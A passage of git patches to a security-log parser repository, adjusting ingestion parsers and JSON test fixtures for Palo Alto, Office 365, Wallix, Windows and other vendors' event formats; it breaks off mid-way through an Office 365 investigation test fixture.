+      "PanOSSourceDeviceModel": "Note 4G",
+      "PanOSSourceDeviceProfile": "l-profile",
+      "PanOSSourceDeviceVendor": "Lenovo",
+      "PanOSSourceDynamicAddressGroup": "blue_dag",
+      "PanOSSourceLocation": "west-coast",
+      "URLCategory": "sports",
+      "VirtualLocation": "vsys1",
       "endpoint": {
         "serial_number": "xxxxxxxxxxxxxx"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json
index ea8e442b5..c90ab6ed6 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json	
@@ -53,6 +53,10 @@
       "vendor": "Palo Alto Networks",
       "version": "2.0"
     },
+    "paloalto": {
+      "VirtualLocation": "vsys1",
+      "VirtualSystemID": "1"
+    },
     "related": {
       "hosts": [
         "PA-5220"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json
index 8c7d37227..edd76521b 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json	
@@ -60,8 +60,13 @@
       "serial_number": "111111111111"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "997",
+      "DGHierarchyLevel2": "738",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "DirectionOfAttack": "server to client",
       "Threat_ContentType": "wildfire",
+      "VirtualLocation": "vsys1",
       "endpoint": {
         "serial_number": "xxxxxxxxxxx"
       },

From ae46b7e574ba9332d7863150339a90ab6ede15c7 Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Thu, 31 Oct 2024 12:21:33 +0200
Subject: [PATCH 191/317] Avoid disabled jinja functions

---
 Palo Alto Networks/paloalto-ngfw/ingest/parser.yml | 14 +++++++-------
 .../paloalto-ngfw/tests/test_ldap_brute_force.json |  3 ++-
 .../paloalto-ngfw/tests/test_threat.json           |  3 ++-
 .../paloalto-ngfw/tests/test_threat_02.json        |  3 ++-
 .../paloalto-ngfw/tests/threat-url-xff.json        |  3 ++-
 .../paloalto-ngfw/tests/threat_csv.json            |  3 ++-
 6 files changed, 17 insertions(+), 12 deletions(-)

diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml
index d82b5d2f1..9add94a53 100644
--- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml	
+++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml	
@@ -733,21 +733,21 @@ stages:
       - set:
           paloalto.threat.type: >
             {%- set id = parsed_threat.message.threat_code | int -%}
-            {%- if id in range(8000, 8100) -%}
+            {%- if 8000 <= id < 8100 -%}
             {%- set name = 'scan detection' -%}
-            {%- elif id in range(8500, 8600) -%}
+            {%- elif 8500 <= id < 8600 -%}
             {%- set name = 'flood detection' -%}
             {%- elif id == 9999 -%}
             {%- set name = 'URL filtering log' -%}
-            {%- elif id in range(10000, 20000) -%}
+            {%- elif 10000 <= id < 20000 -%}
             {%- set name = 'spyware phone home detection' -%}
-            {%- elif id in range(20000, 30000) -%}
+            {%- elif 20000 <= id < 30000 -%}
             {%- set name = 'spyware download detection' -%}
-            {%- elif id in range(30000, 45000) -%}
+            {%- elif 30000 <= id < 45000 -%}
             {%- set name = 'vulnerability exploit detection' -%}
-            {%- elif id in range(52000, 53000) -%}
+            {%- elif 52000 <= id < 53000 -%}
             {%- set name = 'filetype detection' -%}
-            {%- elif id in range(60000 , 70000) -%}
+            {%- elif 60000 <= id < 70000 -%}
             {%- set name = 'data filtering detection' -%}
             {%- endif -%}
             {{name | default('custom threat')}}
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json b/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json
index aab8fbd6b..f569f8246 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json	
@@ -59,7 +59,8 @@
       "VirtualLocation": "vsys1",
       "threat": {
         "id": "40005",
-        "name": "LDAP: User Login Brute Force Attempt"
+        "name": "LDAP: User Login Brute Force Attempt",
+        "type": "vulnerability exploit detection"
       }
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json b/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json
index 48dc1f1bd..51579bdcb 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json	
@@ -54,7 +54,8 @@
       "Threat_ContentType": "url",
       "VirtualLocation": "vsys1",
       "threat": {
-        "id": "9999"
+        "id": "9999",
+        "type": "URL filtering log"
       }
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json b/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json
index e45d01607..eadb40265 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json	
@@ -65,7 +65,8 @@
       "VirtualLocation": "vsys1",
       "threat": {
         "id": "95187",
-        "name": "Palo Alto Networks GlobalProtect OS Command Injection Vulnerability"
+        "name": "Palo Alto Networks GlobalProtect OS Command Injection Vulnerability",
+        "type": "custom threat"
       }
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json b/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json
index b6430085e..57cb1121b 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json	
@@ -67,7 +67,8 @@
       "VirtualLocation": "vsys",
       "VirtualSystemName": "VSYS",
       "threat": {
-        "id": "9999"
+        "id": "9999",
+        "type": "URL filtering log"
       }
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json
index 571880744..20a78b306 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json	
@@ -59,7 +59,8 @@
       "VirtualLocation": "vsys",
       "threat": {
         "id": "34805",
-        "name": "PDF Exploit Evasion Found"
+        "name": "PDF Exploit Evasion Found",
+        "type": "vulnerability exploit detection"
       }
     },
     "related": {

From cb3e8051f3659825e515c09a49a008d51cdf033f Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Tue, 5 Nov 2024 17:14:08 +0200
Subject: [PATCH 192/317] Add connector info to VadeSecure M365

---
 VadeSecure/vade_secure_m365/_meta/manifest.yml | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/VadeSecure/vade_secure_m365/_meta/manifest.yml b/VadeSecure/vade_secure_m365/_meta/manifest.yml
index 8c6e799a6..da4658b6a 100644
--- a/VadeSecure/vade_secure_m365/_meta/manifest.yml
+++ b/VadeSecure/vade_secure_m365/_meta/manifest.yml
@@ -1,6 +1,8 @@
 uuid: e4a758fc-7620-49e6-b8ed-b7fb3d7fa232
 name: Vade for M365
 slug: vade-m365
+automation_connector_uuid: aa1f6d1a-8821-467f-9801-a5293ed37616
+automation_module_uuid: 1411df5b-5de1-40bd-a988-725cfe692aff
 description: >-
   Vade for M365 offers all protections from Vade to our Microsoft 365 Email service
 data_sources:

From e3efa726bbbc5e423677c855d3287a3d8d717001 Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Wed, 6 Nov 2024 12:26:50 +0200
Subject: [PATCH 193/317] Add `raise_errors`

---
 RSA/rsa-securid/ingest/parser.yml                         | 1 +
 Retarus/retarus_email_security/ingest/parser.yml          | 2 ++
 .../skyhigh_secure_web_gateway/ingest/parser.yml          | 1 +
 SonicWall/sonicwall-fw/ingest/parser.yml                  | 2 ++
 Sophos/sophos edr/ingest/parser.yml                       | 5 +++++
 Squid/squid/ingest/parser.yml                             | 1 +
 Systancia/cleanroom/ingest/parser.yml                     | 1 +
 Tehtris/tehtris-edr/ingest/parser.yml                     | 1 +
 ThinkstCanary/thinkst-canary/ingest/parser.yml            | 1 +
 Umbrella/umbrella-proxy/ingest/parser.yml                 | 1 +
 Veeam/veeam_backup/ingest/parser.yml                      | 1 +
 Wallix/wallix-bastion/ingest/parser.yml                   | 1 +
 Wallix/wallix-bastion/tests/cron.json                     | 3 +--
 Wallix/wallix-bastion/tests/pam_unix.json                 | 3 +--
 WatchGuard/watchguard-firebox/ingest/parser.yml           | 1 +
 Windows/windows/ingest/parser.yml                         | 8 ++++++++
 WithSecure/withsecure-elements/ingest/parser.yml          | 2 ++
 17 files changed, 31 insertions(+), 4 deletions(-)

diff --git a/RSA/rsa-securid/ingest/parser.yml b/RSA/rsa-securid/ingest/parser.yml
index c70fee596..451c6f163 100644
--- a/RSA/rsa-securid/ingest/parser.yml
+++ b/RSA/rsa-securid/ingest/parser.yml
@@ -4,6 +4,7 @@ pipeline:
     external:
       name: dsv.parse-dsv
       properties:
+        raise_errors: false
         input_field: original.message
         output_field: message
         columnnames:
diff --git a/Retarus/retarus_email_security/ingest/parser.yml b/Retarus/retarus_email_security/ingest/parser.yml
index 6bd68803a..f55fa8ea7 100644
--- a/Retarus/retarus_email_security/ingest/parser.yml
+++ b/Retarus/retarus_email_security/ingest/parser.yml
@@ -7,6 +7,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: json_event.message.sender
         output_field: sender
         pattern: "^%{GREEDYDATA:username}@%{GREEDYDATA:domain}$"
@@ -15,6 +16,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: json_event.message.recipient
         output_field: recipient
         pattern: "^%{GREEDYDATA:username}@%{GREEDYDATA:domain}$"
diff --git a/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml b/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml
index 9fc2ec259..20b07e5f4 100644
--- a/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml
+++ b/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml
@@ -28,6 +28,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{parse_kv.message.http_request_first_line}}"
         output_field: message
         pattern: "%{WORD:http_method} %{URL:url} HTTP/%{NUMBER:http_version}"
diff --git a/SonicWall/sonicwall-fw/ingest/parser.yml b/SonicWall/sonicwall-fw/ingest/parser.yml
index 8a913cd4e..03aa0ed21 100644
--- a/SonicWall/sonicwall-fw/ingest/parser.yml
+++ b/SonicWall/sonicwall-fw/ingest/parser.yml
@@ -35,6 +35,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{parsed_event.message.susr}}"
         output_field: result
         pattern: "(%{USER_WITH_DOMAIN}|%{GREEDYDATA:user_name})"
@@ -47,6 +48,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{parsed_event.message.msg}}"
         output_field: result
         pattern: "(%{GREEDYDATA}[F|f]ilename: %{FILE:filename}%{GREEDYDATA})"
diff --git a/Sophos/sophos edr/ingest/parser.yml b/Sophos/sophos edr/ingest/parser.yml
index f7dc22739..c4779fa3f 100644
--- a/Sophos/sophos edr/ingest/parser.yml	
+++ b/Sophos/sophos edr/ingest/parser.yml	
@@ -9,6 +9,7 @@ pipeline:
   - external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{parse_json.message.name}}"
         output_field: message
         pattern: 'Access was blocked to "%{URL:url}" because of "%{WORD:rulename}".'
@@ -19,6 +20,7 @@ pipeline:
   - external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{parse_json.message.name}}"
         output_field: message
         pattern: "Controlled application %{WORD}: %{GREEDYDATA:process_title}"
@@ -27,6 +29,7 @@ pipeline:
   - external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{parse_json.message.name}}"
         output_field: message
         pattern: "%{REMOVABLE_STORAGE}|%{STORAGE}"
@@ -38,6 +41,7 @@ pipeline:
   - external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{parse_json.message.name}}"
         output_field: message
         pattern: "PUA %{GREEDYDATA:action}: '%{GREEDYDATA:threat}' at '%{GREEDYDATA:file_path}'"
@@ -46,6 +50,7 @@ pipeline:
   - external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{parse_json.message.name}}"
         output_field: message
         pattern: "'%{GREEDYDATA:threat}' exploit prevented in %{GREEDYDATA:category}"
diff --git a/Squid/squid/ingest/parser.yml b/Squid/squid/ingest/parser.yml
index f5b9de6f9..14c43d5d1 100644
--- a/Squid/squid/ingest/parser.yml
+++ b/Squid/squid/ingest/parser.yml
@@ -48,6 +48,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: parsed_event.message.url
         output_field: message
         pattern: "(%{IP:ip}|%{NOTSPACE:domain}):%{NUMBER:port}"
diff --git a/Systancia/cleanroom/ingest/parser.yml b/Systancia/cleanroom/ingest/parser.yml
index 0b80ff87c..44342010b 100644
--- a/Systancia/cleanroom/ingest/parser.yml
+++ b/Systancia/cleanroom/ingest/parser.yml
@@ -16,6 +16,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{event.result.event_reason}}"
         output_field: result
         pattern: "%{SESSION_SUCCESS}|%{SESSION_FAILURE}|%{PROCESS}"
diff --git a/Tehtris/tehtris-edr/ingest/parser.yml b/Tehtris/tehtris-edr/ingest/parser.yml
index cbcb244bb..aa8f22411 100644
--- a/Tehtris/tehtris-edr/ingest/parser.yml
+++ b/Tehtris/tehtris-edr/ingest/parser.yml
@@ -23,6 +23,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{json_event.message.description}}"
         pattern: "(%{APPLICATION_POLICY}|%{URL_DETECTED}|%{MALICIOUS_MACRO})"
         custom_patterns:
diff --git a/ThinkstCanary/thinkst-canary/ingest/parser.yml b/ThinkstCanary/thinkst-canary/ingest/parser.yml
index f8cada9ff..8ce315396 100644
--- a/ThinkstCanary/thinkst-canary/ingest/parser.yml
+++ b/ThinkstCanary/thinkst-canary/ingest/parser.yml
@@ -21,6 +21,7 @@ pipeline:
     external:
       name: kv.parse-kv
       properties:
+        raise_errors: false
         input_field: "{{parsed_event.message.DN}}"
         output_field: result
         value_sep: "="
diff --git a/Umbrella/umbrella-proxy/ingest/parser.yml b/Umbrella/umbrella-proxy/ingest/parser.yml
index 790c57048..442c5da45 100644
--- a/Umbrella/umbrella-proxy/ingest/parser.yml
+++ b/Umbrella/umbrella-proxy/ingest/parser.yml
@@ -28,6 +28,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "event.message.http_request_url"
         output_field: message
         pattern: "(%{URIPROTO:url_scheme}://)?(?:%{URIHOST:url_domain})?(?:%{URIPATHPARAM:url_path})"
diff --git a/Veeam/veeam_backup/ingest/parser.yml b/Veeam/veeam_backup/ingest/parser.yml
index 5470c716c..7054d0a51 100644
--- a/Veeam/veeam_backup/ingest/parser.yml
+++ b/Veeam/veeam_backup/ingest/parser.yml
@@ -17,6 +17,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{parsed_event.message.UserName}}"
         output_field: user
         pattern: '%{GREEDYDATA:domain}\\%{GREEDYDATA:name}'
diff --git a/Wallix/wallix-bastion/ingest/parser.yml b/Wallix/wallix-bastion/ingest/parser.yml
index ed76d3f43..d9f1be434 100644
--- a/Wallix/wallix-bastion/ingest/parser.yml
+++ b/Wallix/wallix-bastion/ingest/parser.yml
@@ -2,6 +2,7 @@ name: wallix-bastion
 ignored_values: ["-"]
 pipeline:
   - name: parsed_event
+    filter: '{{not original.message.startswith("pam_unix(")}}'
     external:
       name: kv.parse-kv
       properties:
diff --git a/Wallix/wallix-bastion/tests/cron.json b/Wallix/wallix-bastion/tests/cron.json
index da4487e2e..fdb9da3bc 100644
--- a/Wallix/wallix-bastion/tests/cron.json
+++ b/Wallix/wallix-bastion/tests/cron.json
@@ -15,7 +15,6 @@
     },
     "user": {
       "name": "root"
-    },
-    "wallix": {}
+    }
   }
 }
\ No newline at end of file
diff --git a/Wallix/wallix-bastion/tests/pam_unix.json b/Wallix/wallix-bastion/tests/pam_unix.json
index 5dd28b147..d7ce961b4 100644
--- a/Wallix/wallix-bastion/tests/pam_unix.json
+++ b/Wallix/wallix-bastion/tests/pam_unix.json
@@ -15,7 +15,6 @@
     },
     "user": {
       "name": "wabuser"
-    },
-    "wallix": {}
+    }
   }
 }
\ No newline at end of file
diff --git a/WatchGuard/watchguard-firebox/ingest/parser.yml b/WatchGuard/watchguard-firebox/ingest/parser.yml
index 23bdfd0d6..36e32c512 100644
--- a/WatchGuard/watchguard-firebox/ingest/parser.yml
+++ b/WatchGuard/watchguard-firebox/ingest/parser.yml
@@ -14,6 +14,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{parsed_event.message.msg}}"
         output_field: message
         pattern: "%{DHCP}|%{USER_LOG}"
diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml
index 988ae3dbc..5fc6b2eec 100644
--- a/Windows/windows/ingest/parser.yml
+++ b/Windows/windows/ingest/parser.yml
@@ -35,6 +35,7 @@ pipeline:
     external:
       name: kv.parse-kv
       properties:
+        raise_errors: false
         input_field: "{{json.event.Hashes or json.event.Hash}}"
         output_field: result
         value_sep: "="
@@ -46,6 +47,7 @@ pipeline:
     external:
       name: kv.parse-kv
       properties:
+        raise_errors: false
         input_field: "{{json.event.Hashes or json.event.Hash}}"
         output_field: result
         value_sep: ":"
@@ -84,6 +86,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{json.event.IpAddress}}"
         output_field: event
         pattern: "%{GREEDYDATA}%{IPV4:ip}%{GREEDYDATA}"
@@ -94,6 +97,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{parsed_message_kv.result.Contents}}"
         output_field: event
         pattern: >-
@@ -105,6 +109,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{json.event.url or json.event.RemoteName}}"
         output_field: event
         pattern: >-
@@ -116,6 +121,7 @@ pipeline:
       name: grok.match
       description: #NEWLINE# is used because grok does not match multi-line fields and the KV stage does not support this field format.
       properties:
+        raise_errors: false
         input_field: '{{json.event.ContextInfo.replace(" "," ").replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}'
         output_field: event
         pattern: "%{CONTEXTINFO_FR}|%{CONTEXTINFO_EN}"
@@ -128,6 +134,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: '{{json.event.Message.replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}'
         output_field: result
         pattern: >-
@@ -139,6 +146,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: '{{json.event.Message.replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}'
         output_field: event
         pattern: >-
diff --git a/WithSecure/withsecure-elements/ingest/parser.yml b/WithSecure/withsecure-elements/ingest/parser.yml
index 83bd21cff..3f8525c4d 100644
--- a/WithSecure/withsecure-elements/ingest/parser.yml
+++ b/WithSecure/withsecure-elements/ingest/parser.yml
@@ -17,6 +17,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{json_event.message.details.userName}}"
         output_field: user
         pattern: "(%{DATA:domain}[/\\\\]+)?(%{USERNAME:name})"
@@ -25,6 +26,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{json_event.message.userName}}"
         output_field: user
         pattern: "(%{DATA:domain}[/\\\\]+)?(%{USERNAME:name})"

From ae8806c15f2905ce6b5333b2a4e82d8daa138ec9 Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Wed, 6 Nov 2024 12:52:13 +0200
Subject: [PATCH 194/317] Fix linting

---
 Wallix/wallix-bastion/tests/session_integrity.json | 14 ++++++++++----
 1 file changed, 10 insertions(+), 4 deletions(-)

diff --git a/Wallix/wallix-bastion/tests/session_integrity.json b/Wallix/wallix-bastion/tests/session_integrity.json
index 39e8a6363..1c01481e9 100644
--- a/Wallix/wallix-bastion/tests/session_integrity.json
+++ b/Wallix/wallix-bastion/tests/session_integrity.json
@@ -6,13 +6,19 @@
     "message": "[sessionintegrity] session_uid=\"1830c403be7caf0c00505688c380\" status=\"failed\" type=\"SSH_SHELL_SESSION\" user=\"adm@CORP.NET@1.1.1.1\" target=\"domain@local@target01.corp.net:SSH_1\" begin=\"2022-08-19 11:31:17\" end=\"2022-08-19 11:32:50\" files=[/var/wab/remote/recorded/ssh/2022-08-19/182b5714b466cba10050568e16d9,adm@CORP.NET@1.1.1.1,domain@target01.corp.net,20220819-113117,foo-bastion-bar.corp.net,1805.ttyrec]",
     "event": {
       "action": "SSH_SHELL_SESSION",
-      "category": ["session"],
+      "category": [
+        "session"
+      ],
       "dataset": "session_integrity",
       "outcome": "failure",
-      "type": ["info"]
+      "type": [
+        "info"
+      ]
     },
     "related": {
-      "user": ["adm@CORP.NET@1.1.1.1"]
+      "user": [
+        "adm@CORP.NET@1.1.1.1"
+      ]
     },
     "user": {
       "name": "adm@CORP.NET@1.1.1.1"
@@ -21,4 +27,4 @@
       "type": "SSH_SHELL_SESSION"
     }
   }
-}
+}
\ No newline at end of file

From 249b9c59758763434b683213b533d0f411c8b822 Mon Sep 17 00:00:00 2001
From: "vladyslav.guriev" <vladyslav.guriev@gmail.com>
Date: Wed, 6 Nov 2024 15:28:00 +0200
Subject: [PATCH 195/317] Fix: o365 investigation emails

---
 Office 365/o365/ingest/parser.yml             |  37 +++-
 ...utomated_investigation_and_response_1.json | 170 ++++++++++++++++++
 ...n_and_response_with_additional_fields.json |   1 +
 ...and_response_with_additional_fields_1.json |  18 +-
 ...tigation_and_response_with_attachment.json |  14 ++
 5 files changed, 237 insertions(+), 3 deletions(-)
 create mode 100644 Office 365/o365/tests/automated_investigation_and_response_1.json

diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml
index 67f475aad..61a06f847 100644
--- a/Office 365/o365/ingest/parser.yml	
+++ b/Office 365/o365/ingest/parser.yml	
@@ -498,7 +498,7 @@ stages:
                 {%- for entity in action.Entities -%}
                 {
                   {%- if entity.AntispamDirection != null -%}"direction": "{{entity.AntispamDirection}}",{%- endif -%}
-                  {%- if entity.NetworkMessageIds != null -%}"message_ids": "{{entity.NetworkMessageIds}}",{%- endif -%}
+                  {%- if entity.NetworkMessageIds != null -%}"message_ids": {{entity.NetworkMessageIds}},{%- endif -%}
                   {%- if entity.NetworkMessageId != null -%}"message_ids": ["{{entity.NetworkMessageId}}"],{%- endif -%}
                   {%- if entity.Language != null -%}"language": "{{entity.Language}}",{%- endif -%}
                   {%- if entity.DeliveryAction != null or entity.DeliveryLocation != null or entity.OriginalDeliveryLocation != null -%}
@@ -511,8 +511,41 @@ stages:
                 },
                 {%- endfor -%}
               {%- endfor -%}
+
+              {%- for entity in parse_data.ParsedData.Entities -%}
+                {%- if entity.AntispamDirection != null or entity.NetworkMessageIds != null or entity.Language != null or entity.DeliveryAction != null or entity.DeliveryLocation != null or entity.OriginalDeliveryLocation != null -%}
+                {
+                  {%- if entity.AntispamDirection != null -%}"direction": "{{entity.AntispamDirection}}",{%- endif -%}
+                  {%- if entity.NetworkMessageIds != null -%}"message_ids": {{entity.NetworkMessageIds}},{%- endif -%}
+                  {%- if entity.NetworkMessageId != null -%}"message_ids": ["{{entity.NetworkMessageId}}"],{%- endif -%}
+                  {%- if entity.Language != null -%}"language": "{{entity.Language}}",{%- endif -%}
+                  {%- if entity.DeliveryAction != null or entity.DeliveryLocation != null or entity.OriginalDeliveryLocation != null -%}
+                    "delivery": {
+                      {%- if entity.DeliveryAction!= null -%}"action": "{{entity.DeliveryAction}}",{%- endif -%}
+                      {%- if entity.DeliveryLocation != null -%}"location": "{{entity.DeliveryLocation}}",{%- endif -%}
+                      {%- if entity.OriginalDeliveryLocation -%}"original_location": "{{entity.OriginalDeliveryLocation}}",{%- endif -%}
+                    },
+                  {%- endif -%}
+                },
+                {%- endif -%}
+              {%- endfor -%}
+            ]
+        filter: '{{(json_event.message.get("Actions") != None and json_event.message.Actions | map("from_json") | rejectattr("Entities") | list | length  !=  json_event.message.Actions | list | length) or parse_data.ParsedData.get("Entities", []) | length > 0}}'
+
+      - set:
+          office365.investigation.emails: >
+            [
+              {% set result = [] %}
+              {% for data in final.office365.investigation.emails %}
+                {% if data not in result %}
+                  {% set result = result.append(data) %}
+                {% endif %}
+              {% endfor %}
+              {%- for data in result -%}
+                {{data}},
+              {%- endfor -%}
             ]
-        filter: '{{json_event.message.get("Actions") != None and json_event.message.Actions | map("from_json") | rejectattr("Entities") | list | length  !=  json_event.message.Actions | list | length}}'
+        filter: "{{final.office365.get('investigation', {}).get('emails', []) | length > 1}}"
 
       - set:
           office365.investigation.email.urls: '[{% for Property in parse_data.ParsedData.Entities %}{% for Url in Property.Urls %} "{{Url}}", {% endfor %}{% endfor %}]'
diff --git a/Office 365/o365/tests/automated_investigation_and_response_1.json b/Office 365/o365/tests/automated_investigation_and_response_1.json
new file mode 100644
index 000000000..fb46179f0
--- /dev/null
+++ b/Office 365/o365/tests/automated_investigation_and_response_1.json	
@@ -0,0 +1,170 @@
+{
+  "input": {
+    "message": "{\n    \"CreationTime\":\"2024-10-31T16:24:41\",\n    \"Id\":\"c3ebef20-fb63-4d14-b3c1-7bfb5937903a\",\n    \"Operation\":\"AirInvestigationData\",\n    \"OrganizationId\":\"xxxxxx-xxxxx-xxxxxxx-xxxxxxx-xxxxxxx\",\n    \"RecordType\":64,\n    \"UserKey\":\"AirInvestigation\",\n    \"UserType\":4,\n    \"Version\":1,\n    \"Workload\":\"AirInvestigation\",\n    \"ObjectId\":\"c3ebef20-fb63-4d14-b3c1-7bfb5937903a\",\n    \"UserId\":\"AirInvestigation\",\n    \"Actions\":[\n       \"{\\\"$id\\\":\\\"1\\\",\\\"ActionId\\\":\\\"urn:EmailZapper:a17bc80a136cbf4f5d4e82f43a9a3d1d\\\",\\\"InvestigationId\\\":\\\"urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101\\\",\\\"ActionApproval\\\":\\\"None\\\",\\\"ActionType\\\":\\\"EmailRemediation\\\",\\\"ActionStatus\\\":\\\"Pending\\\",\\\"Entities\\\":[{\\\"$id\\\":\\\"2\\\",\\\"NetworkMessageIds\\\":[\\\"24b8430c-484d-4ee0-e12b-08dcee99416a\\\",\\\"2e99f39a-c998-4d94-2085-08dce9cd0b7d\\\",\\\"0ac4ee3c-7c79-408e-76c2-08dcf4106b65\\\",\\\"fd400540-8a8d-42ae-d1f9-08dced20c42f\\\",\\\"31cfca73-f309-4e21-cbc4-08dceed074cf\\\",\\\"0491b33a-15fc-4503-9dd1-08dced818f57\\\",\\\"4b620244-917b-4a04-7416-08dcf50af378\\\",\\\"1abed68d-3b03-46bd-45e2-08dcf43fb625\\\",\\\"abb4c4a5-7049-4047-5a68-08dcec201c1f\\\",\\\"92bba720-15bc-4f09-49f2-08dcf8d738a4\\\",\\\"3d511617-b717-416c-89cf-08dcf90a51c7\\\",\\\"c3ad4b6b-0fd9-4510-4481-08dcf9043502\\\",\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\",\\\"a1d9684c-9982-4f80-880c-08dcf775c1a9\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":5,\\\"Phish\\\":0,\\\"Malware\\\":0,\\\"Spam\\\":0,\\\"MaliciousUrl\\\":15},\\\"CountByProtectionStatus\\\":{\\\"Delivered\\\":10,\\\"Blocked\\\":4,\\\"DeliveredAsSpam\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"Inbox\\\":10,\\\"Quarantine\\\":4,\\\"DeletedFolder\\\":1},\\\"Query\\\":\\\"( ((NormalizedUrl:\\\\\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en\\\\\\\") AND (ContentType: 1)) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-10-31T13:31:54.2957192Z\\\",\\\"MailCount\\\":15,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en\\\",\\\"ClusterSourceType\\\":\\\"UrlThreatIndicator\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-10-11T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-10-31T13:31:54.2957192Z\\\",\\\"ClusterGroup\\\":\\\"UrlThreatIdentifier\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"NormalizedUrl;ContentType\\\",\\\"ClusterByValue\\\":\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en;1\\\",\\\"QueryStartTime\\\":\\\"10/11/2024 12:00:00 